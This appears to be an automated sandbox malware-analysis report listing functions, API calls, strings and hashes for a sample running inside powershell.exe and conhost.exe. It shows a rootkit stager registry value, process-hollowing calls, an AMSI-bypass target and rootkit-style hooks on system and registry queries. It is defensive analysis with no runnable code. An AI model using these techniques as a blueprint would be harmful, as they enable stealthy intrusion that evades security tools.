Instruction Fuzzy Hash: 7EF05B71700218ABDB145BA59E48B9FB7FCAF44344F040077E505F3290EA749E01C664

Function 00401798 Relevance: 3.0, APIs: 2, Instructions: 3
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004017A5: FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 004017B5
Part of subcall function 004017A5: SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017C8
Part of subcall function 004017A5: LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017DA
Part of subcall function 004017A5: LockResource.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 004017E5
Part of subcall function 004017A5: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,0040179D), ref: 00401801
Part of subcall function 004017A5: RegSetValueExW.KERNELBASE(?,$rbx-stager,00000000,00000003,00000000,00000000,?,?,?,?,?,0040179D), ref: 00401818

ExitProcess.KERNEL32 ref: 0040179E

Memory Dump Source

Source File: 00000026.00000002.2037908571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_powershell.jbxd

Similarity

API ID: Resource$ExitFindLoadLockOpenProcessSizeofValue
String ID:
API String ID: 3836967525-0
Opcode ID: 6f5a291add5b719a9ef9962163c102a842408bd3c615f02f78525d4f468f85bb
Instruction ID: 349935dfe58169e56b8de0d8f460e35c8f36df872e6f4d206b9f951cc53eac22
Opcode Fuzzy Hash: 6f5a291add5b719a9ef9962163c102a842408bd3c615f02f78525d4f468f85bb
Instruction Fuzzy Hash:

Non-executed Functions

Function 0040118E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 10
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,00401178,?), ref: 00401193
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 004011A3

Strings

ntdll.dll, xrefs: 0040118E
RtlGetVersion, xrefs: 0040119D

Memory Dump Source

Source File: 00000026.00000002.2037908571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_powershell.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: RtlGetVersion$ntdll.dll
API String ID: 1646373207-1489217083
Opcode ID: ee2441e5e750a461a1f1097b91d62800b241895c27a46cee72e654fece4d54b8
Instruction ID: 0863f5cf0c3234c6e1236f6f2d3f4997342a4c328dcd20e5af414fba7a7cf28b
Opcode Fuzzy Hash: ee2441e5e750a461a1f1097b91d62800b241895c27a46cee72e654fece4d54b8
Instruction Fuzzy Hash: D2C09B70F807006AFF151F709F0DB17295859487023540573B305F51D4DAFCC404D52C

Analysis Process: powershell.exePID: 3380, Parent PID: 932COMMON

Execution Graph

Execution Coverage:	12.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	13.2%
Total number of Nodes:	159
Total number of Limit Nodes:	10

Executed Functions

Function 00007FFAAB79DF98 Relevance: 1.7, APIs: 1, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000027.00000002.2300660193.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaab790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 076bbe2a3c7c5129b88777b2def7277d29900da1a7c3d19aa5e2e67b313a0835
Instruction ID: 1c303b953cde1e0908b07ca26f7a3c722c55e9b90a1aad38accb1877faf10adc
Opcode Fuzzy Hash: 076bbe2a3c7c5129b88777b2def7277d29900da1a7c3d19aa5e2e67b313a0835
Instruction Fuzzy Hash: B851096290E7848FDB56D76C98566E97FB1EF53210F0880FBD08DC70B3D958580D8791

Function 00007FFAAB7A0C5D Relevance: 1.6, APIs: 1, Instructions: 129
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL ref: 00007FFAAB7A0D27

Memory Dump Source

Source File: 00000027.00000002.2300660193.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaab790000_powershell.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: a51bea2b4635ed32da4f28fd8793c31663c25614719ba6dc6d0beb5f34e1e767
Instruction ID: 1e8fea4ce73b894171b53645f2b491f2217b62c6e8839445d8ca98a9c308754a
Opcode Fuzzy Hash: a51bea2b4635ed32da4f28fd8793c31663c25614719ba6dc6d0beb5f34e1e767
Instruction Fuzzy Hash: 6231937190CA488FDB58DF58D8456F9BBF1FB5A321F04426ED049D36A2CB70A816CB85

Function 00007FFAAB79E078 Relevance: 1.6, APIs: 1, Instructions: 122
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00007FFAAB7A0AFB

Memory Dump Source

Source File: 00000027.00000002.2300660193.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaab790000_powershell.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: ef231625e78d40d587521f2dce4778e0b5cabb2737a2d8934b9fc2e1deff93d2
Instruction ID: 1fc5732b0ecec2982d2fb5fc75941e98fb24153b265597976f91fb8f6a0884f5
Opcode Fuzzy Hash: ef231625e78d40d587521f2dce4778e0b5cabb2737a2d8934b9fc2e1deff93d2
Instruction Fuzzy Hash: 9431487190D7888FEB68DB5CD8097F97BF0EB56320F04816FD04DC31A6D6609849C792

Function 00007FFAAB7A0A3E Relevance: 1.6, APIs: 1, Instructions: 115
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00007FFAAB7A0AFB

Memory Dump Source

Source File: 00000027.00000002.2300660193.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaab790000_powershell.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 0bb2c964556ef0f1cee3826845efe800da0278a2a6197e2eef40c06da5c7cab4
Instruction ID: fcc5aa9193c3dfeb98415bad49c8dcf90f89c5df70bcec0cdc4d9404feb053a8
Opcode Fuzzy Hash: 0bb2c964556ef0f1cee3826845efe800da0278a2a6197e2eef40c06da5c7cab4
Instruction Fuzzy Hash: 9831E53090D6888FDB59DF68C846BA97FF0EF56320F0442AFD049C71A3D664A446CB92

Function 00007FFAAB7A0FE4 Relevance: 1.6, APIs: 1, Instructions: 114
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtResumeThread.NTDLL ref: 00007FFAAB7A1095

Memory Dump Source

Source File: 00000027.00000002.2300660193.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaab790000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 687d12e50f75011774f041532e490ae434a8370af38379737070e839e1bd0c8e
Instruction ID: bfca7b8923f16534e3a6f370c7ad8dd3000883acac45d599e492df60a4d1d48c
Opcode Fuzzy Hash: 687d12e50f75011774f041532e490ae434a8370af38379737070e839e1bd0c8e
Instruction Fuzzy Hash: 7F31D57190C64C8FDB58DF9CD8457EABBF1EB56311F04416BD009D3252CB70A806CB91

Function 00007FFAAB7A0F20 Relevance: 1.6, APIs: 1, Instructions: 97
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtSetContextThread.NTDLL ref: 00007FFAAB7A0FAB

Memory Dump Source

Source File: 00000027.00000002.2300660193.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaab790000_powershell.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 7c4971a3d42159cd201bd0534eea0ce697d3a0cb19d2b28e70000dcc338d40aa
Instruction ID: ebebf87e8a9053cddfea8a7ebe02ab7b6940ed2d1204e396ad2678f5a5bf7c24
Opcode Fuzzy Hash: 7c4971a3d42159cd201bd0534eea0ce697d3a0cb19d2b28e70000dcc338d40aa
Instruction Fuzzy Hash: 9F21913190CA4C8FDB58EF58D8467E97BF0EB5A321F04416FD04DD3262CA74A846CB91

Function 00007FFAAB7A0221 Relevance: 2.4, APIs: 1, Instructions: 893
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE ref: 00007FFAAB7A093D

Memory Dump Source

Source File: 00000027.00000002.2300660193.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaab790000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 57542af756ab5472e16daaef581d64a993aa90e24b9f7cb4258c75498ce0f93e
Instruction ID: 4789144b5a02d48ec2faa5c22020a1c72f69047222d747afdecf8d22576a311d
Opcode Fuzzy Hash: 57542af756ab5472e16daaef581d64a993aa90e24b9f7cb4258c75498ce0f93e
Instruction Fuzzy Hash: E2D11530509B898FEB64DF28C8467F977E0FF56351F04826ED84DC72A2DA74A4458BC2

Function 00007FFAAB79EAFA Relevance: 1.7, APIs: 1, Instructions: 245
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileMappingW.KERNELBASE ref: 00007FFAAB79ECA6

Memory Dump Source

Source File: 00000027.00000002.2300660193.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaab790000_powershell.jbxd

Similarity

API ID: CreateFileMapping
String ID:
API String ID: 524692379-0
Opcode ID: ba9543335e3340d7e8bad6f99720bcaad984f48755a223a617124e7993e18c60
Instruction ID: f00d0546107db139dc3bfd9798b6e51cf9319a5cff4922c121216628f62c72f9
Opcode Fuzzy Hash: ba9543335e3340d7e8bad6f99720bcaad984f48755a223a617124e7993e18c60
Instruction Fuzzy Hash: 0A71097050DA8D8FDB59DF28C8467E43BE0FF56310F14426AE84DC72A2DA75E845CB81

Function 00007FFAAB79E8AC Relevance: 1.7, APIs: 1, Instructions: 227
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 00007FFAAB79EA39

Memory Dump Source

Source File: 00000027.00000002.2300660193.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaab790000_powershell.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 286e08bbe06ba434c66e43eb9a26732089991ed6d2a18cd37999db671ba597b0
Instruction ID: 23581b21c6ce54fc6a8591263ffc407e176f3bab2a4007ddf851f9853386cc6b
Opcode Fuzzy Hash: 286e08bbe06ba434c66e43eb9a26732089991ed6d2a18cd37999db671ba597b0
Instruction Fuzzy Hash: 7761FA7091CB8D8FDBA8DF28C8467E437E0FB59350F14426AE84DC3262CA75E8458BC2

Function 00007FFAAB79ED66 Relevance: 1.6, APIs: 1, Instructions: 134
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MapViewOfFile.KERNELBASE ref: 00007FFAAB79EE43

Memory Dump Source

Source File: 00000027.00000002.2300660193.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaab790000_powershell.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: a1d7aadf52aaef38cb65c4d050db99f2a358a229e75166b06ee12dabcb2b81f9
Instruction ID: 82a4ffec3a4e685c2f4d345f236b961f79fbb792fc37181e0c6de8741485a78d
Opcode Fuzzy Hash: a1d7aadf52aaef38cb65c4d050db99f2a358a229e75166b06ee12dabcb2b81f9
Instruction Fuzzy Hash: 8241283190CA889FEB19DB68D806AE97BF0FF56321F14426ED099C31A2CB756446CB91

Function 00007FFAAB79E7A8 Relevance: 1.6, APIs: 1, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

K32GetModuleInformation.KERNEL32 ref: 00007FFAAB79E862

Memory Dump Source

Source File: 00000027.00000002.2300660193.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaab790000_powershell.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 97383484a8d3e1f9efb96636f89b716c75247ba48ad9304b20ea4529f0484d7f
Instruction ID: e9467ffe0aa487cdb6a105e0c7e8432479e4be8c8b498af14c328aeafb948e11
Opcode Fuzzy Hash: 97383484a8d3e1f9efb96636f89b716c75247ba48ad9304b20ea4529f0484d7f
Instruction Fuzzy Hash: 5D31263190CA0C8FDB18DBA8D849AF9BBE1EF56321F04427FD049D3292CB7468468B81

Function 00007FFAAB862DE1 Relevance: 1.3, Strings: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8hi, xrefs: 00007FFAAB862E2C

Memory Dump Source

Source File: 00000027.00000002.2302210539.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaab860000_powershell.jbxd

Similarity

API ID:
String ID: 8hi
API String ID: 0-2684157312
Opcode ID: 8e8373f8ed9f2f72715b184d56f40dd4a5874c1b7956cdf3d9b48d0a2a09a21d
Instruction ID: 7d560eb71079ee853bb109d4087acd19c2531afafe4e030fd34162c2f74d2c0c
Opcode Fuzzy Hash: 8e8373f8ed9f2f72715b184d56f40dd4a5874c1b7956cdf3d9b48d0a2a09a21d
Instruction Fuzzy Hash: 7121FB9391FBC94FE3A59B6C58652A8EBC1EF6A290F1940FAD09DC71E3D8186C0D43D1

Function 00007FFAAB862ED1 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000027.00000002.2302210539.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_7ffaab860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62123e18b7b7d34adc855414ff418a72ed618cddaa5ae33593ff4453a387841c
Instruction ID: 2253751f01e55e249c544ab4f4a368e252a0afeaf76ba6bbe833e3d51e5ede0b
Opcode Fuzzy Hash: 62123e18b7b7d34adc855414ff418a72ed618cddaa5ae33593ff4453a387841c
Instruction Fuzzy Hash: 08D05E1370E90E8F92A4AB1C24181A8F790DB9D2E1B2086FBC04EC7191C9059C0C4380

Analysis Process: conhost.exePID: 2332, Parent PID: 3380COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1399
Total number of Limit Nodes:	2

Executed Functions

Function 000001D547831E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000001D547831E7F

Part of subcall function 000001D5478322A8: GetModuleHandleA.KERNEL32(?,?,?,000001D547831EB1), ref: 000001D5478322C0
Part of subcall function 000001D5478322A8: GetProcAddress.KERNEL32(?,?,?,000001D547831EB1), ref: 000001D5478322D1

CreateThread.KERNELBASE ref: 000001D547832043
TlsAlloc.KERNEL32 ref: 000001D547832049
TlsAlloc.KERNEL32 ref: 000001D547832055
TlsAlloc.KERNEL32 ref: 000001D547832061
TlsAlloc.KERNEL32 ref: 000001D54783206D
TlsAlloc.KERNEL32 ref: 000001D547832079
TlsAlloc.KERNEL32 ref: 000001D547832085

Strings

EnumServicesStatusExW, xrefs: 000001D547831F71, 000001D547831F92
NtEnumerateKey, xrefs: 000001D547831F19
AmsiScanBuffer, xrefs: 000001D547832012
NtQueryDirectoryFile, xrefs: 000001D547831EDF
NtQuerySystemInformation, xrefs: 000001D547831EA5
NtResumeThread, xrefs: 000001D547831EC2
EnumServiceGroupW, xrefs: 000001D547831F50
sechost.dll, xrefs: 000001D547831F99
PdhGetFormattedCounterArrayW, xrefs: 000001D547831FF1
pdh.dll, xrefs: 000001D547831FD7, 000001D547831FF8
NtEnumerateValueKey, xrefs: 000001D547831F36
NtDeviceIoControlFile, xrefs: 000001D547831FB6
ntdll.dll, xrefs: 000001D547831E8D
PdhGetRawCounterArrayW, xrefs: 000001D547831FD0
advapi32.dll, xrefs: 000001D547831F57, 000001D547831F78
amsi.dll, xrefs: 000001D547832019
NtQueryDirectoryFileEx, xrefs: 000001D547831EFC

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 07fcff90c878bb49bb014a0041508c6db0ee3d506095432bb243403372a48738
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 2E519C70A00E4AA5EF90EB68ED547D42323F75076BF805623980902561FFBE86DED3C2

Function 000001D547831E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000001D547831E47
GetProcAddress.KERNEL32 ref: 000001D547831E57
SleepEx.KERNELBASE ref: 000001D547831E67

Strings

amsi.dll, xrefs: 000001D547831E40
AmsiScanBuffer, xrefs: 000001D547831E50

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: acf08177accd688951241f3642a0c2e510dcfd9490e2fd9992d428b8029861c3
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 2CD06734A11E00D6EFA86B15E8543D82263BB64F43FC41517C50A116A0FFAD99DDA3C2

Function 000001D547833A1C Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000001D547833A35
PathFindFileNameW.SHLWAPI ref: 000001D547833A44

Part of subcall function 000001D547833F88: StrCmpNIW.SHLWAPI(?,?,?,000001D54783272F), ref: 000001D547833FA0

Part of subcall function 000001D547833EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000001D547833A5B), ref: 000001D547833EDB
Part of subcall function 000001D547833EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001D547833A5B), ref: 000001D547833F0E
Part of subcall function 000001D547833EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001D547833A5B), ref: 000001D547833F2E
Part of subcall function 000001D547833EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001D547833A5B), ref: 000001D547833F47
Part of subcall function 000001D547833EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001D547833A5B), ref: 000001D547833F68

CreateThread.KERNELBASE ref: 000001D547833A8B

Part of subcall function 000001D547831E74: GetCurrentThread.KERNEL32 ref: 000001D547831E7F
Part of subcall function 000001D547831E74: CreateThread.KERNELBASE ref: 000001D547832043
Part of subcall function 000001D547831E74: TlsAlloc.KERNEL32 ref: 000001D547832049
Part of subcall function 000001D547831E74: TlsAlloc.KERNEL32 ref: 000001D547832055
Part of subcall function 000001D547831E74: TlsAlloc.KERNEL32 ref: 000001D547832061
Part of subcall function 000001D547831E74: TlsAlloc.KERNEL32 ref: 000001D54783206D
Part of subcall function 000001D547831E74: TlsAlloc.KERNEL32 ref: 000001D547832079
Part of subcall function 000001D547831E74: TlsAlloc.KERNEL32 ref: 000001D547832085

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
String ID:
API String ID: 2779030803-0
Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction ID: e4252b887d8190c8cb5ff571e513bf233a51b16f3e19eec2b73a82e28a3630af
Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction Fuzzy Hash: 40114C31A10E0192FFE0A72AE5597DD23A3E754797F90421B9416919D0FF7AC4C486C2

Function 000001D547802EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 000001D54780302E

Memory Dump Source

Source File: 00000028.00000003.2188818508.000001D547800000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D547800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_3_1d547800000_conhost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: a359f520ded64d5a4205867f34b4f0599f6147fac5652aa21422b5a208f6ae5b
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: 0F914A727019D087DFA48F15D400BBD7B92F748B9AF56812AAE4907B88EB34D892C751

Function 000001D547831BC4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001D547831724: GetProcessHeap.KERNEL32 ref: 000001D54783172F
Part of subcall function 000001D547831724: HeapAlloc.KERNEL32 ref: 000001D54783173E
Part of subcall function 000001D547831724: RegOpenKeyExW.ADVAPI32 ref: 000001D5478317AE
Part of subcall function 000001D547831724: RegOpenKeyExW.ADVAPI32 ref: 000001D5478317DB
Part of subcall function 000001D547831724: RegCloseKey.ADVAPI32 ref: 000001D5478317F5
Part of subcall function 000001D547831724: RegOpenKeyExW.ADVAPI32 ref: 000001D547831815
Part of subcall function 000001D547831724: RegCloseKey.ADVAPI32 ref: 000001D547831830
Part of subcall function 000001D547831724: RegOpenKeyExW.ADVAPI32 ref: 000001D547831850
Part of subcall function 000001D547831724: RegCloseKey.ADVAPI32 ref: 000001D54783186B
Part of subcall function 000001D547831724: RegOpenKeyExW.ADVAPI32 ref: 000001D54783188B
Part of subcall function 000001D547831724: RegCloseKey.ADVAPI32 ref: 000001D5478318A6
Part of subcall function 000001D547831724: RegOpenKeyExW.ADVAPI32 ref: 000001D5478318C6

SleepEx.KERNELBASE ref: 000001D547831BDF

Part of subcall function 000001D547831724: RegCloseKey.ADVAPI32 ref: 000001D5478318E1
Part of subcall function 000001D547831724: RegOpenKeyExW.ADVAPI32 ref: 000001D547831901
Part of subcall function 000001D547831724: RegCloseKey.ADVAPI32 ref: 000001D54783191C
Part of subcall function 000001D547831724: RegOpenKeyExW.ADVAPI32 ref: 000001D54783193C
Part of subcall function 000001D547831724: RegCloseKey.ADVAPI32 ref: 000001D547831957
Part of subcall function 000001D547831724: RegOpenKeyExW.ADVAPI32 ref: 000001D547831977
Part of subcall function 000001D547831724: RegCloseKey.ADVAPI32 ref: 000001D547831992
Part of subcall function 000001D547831724: RegCloseKey.ADVAPI32 ref: 000001D54783199C

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: CloseOpen$Heap$AllocProcessSleep
String ID:
API String ID: 948135145-0
Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction ID: 225da3b0a620ceffb87c908fb02f0386234bc24a81003241eb2dcde69dda7dd6
Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction Fuzzy Hash: 0F312D75B00E4181FFD09B2ED5503E923A6EB48FE2F0454238E0D87296FF26C8D28296

Non-executed Functions

Function 000001D547832FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000001D547833094
lstrlenW.KERNEL32 ref: 000001D5478332BE

Part of subcall function 000001D547831A30: OpenProcess.KERNEL32 ref: 000001D547831A56
Part of subcall function 000001D547831A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001D547831A74
Part of subcall function 000001D547831A30: PathFindFileNameW.SHLWAPI ref: 000001D547831A83
Part of subcall function 000001D547831A30: lstrlenW.KERNEL32 ref: 000001D547831A8F
Part of subcall function 000001D547831A30: StrCpyW.SHLWAPI ref: 000001D547831AA2
Part of subcall function 000001D547831A30: CloseHandle.KERNEL32 ref: 000001D547831AB0

GetProcAddress.KERNEL32 ref: 000001D5478330A9

Part of subcall function 000001D547833F88: StrCmpNIW.SHLWAPI(?,?,?,000001D54783272F), ref: 000001D547833FA0

StrCmpNIW.SHLWAPI ref: 000001D5478330EC
lstrlenW.KERNEL32 ref: 000001D547833214

Strings

ntdll.dll, xrefs: 000001D54783308D
NtQueryObject, xrefs: 000001D54783309F
\Device\Nsi, xrefs: 000001D5478330DF

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

